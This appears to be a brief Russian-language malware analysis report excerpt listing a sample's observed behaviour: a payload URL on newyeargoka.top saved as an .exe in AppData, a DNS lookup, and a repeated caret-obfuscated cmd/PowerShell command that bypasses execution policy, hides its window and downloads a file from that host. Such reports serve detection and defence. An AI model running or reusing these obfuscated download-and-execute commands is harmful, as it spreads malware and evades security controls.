Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Po^WERsH^eLl^.E^x^E^ -^eXeCUt^io^nPO^l^Icy^ ^BYPAsS^ ^-^n^O^PRO^FilE -w^iNd^Ow^stYlE hIdd^e^n (^NEw-^ObJec^t S^YStE^M.^n^e^T.^WE^BCl^ie^NT^)^.^doWn^L^Oa^DfIle(^'http://newyear...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /c "Po^WERsH^eLl^.E^x^E^ -^eXeCUt^io^nPO^l^Icy^ ^BYPAsS^ ^-^n^O^PRO^FilE -w^iNd^Ow^stYlE hIdd^e^n (^NEw-^ObJec^t S^YStE^M.^n^e^T.^WE^BCl^ie^NT^)^.^doWn^L^Oa^DfIle(^'http://newyear...' (со скрытым окном)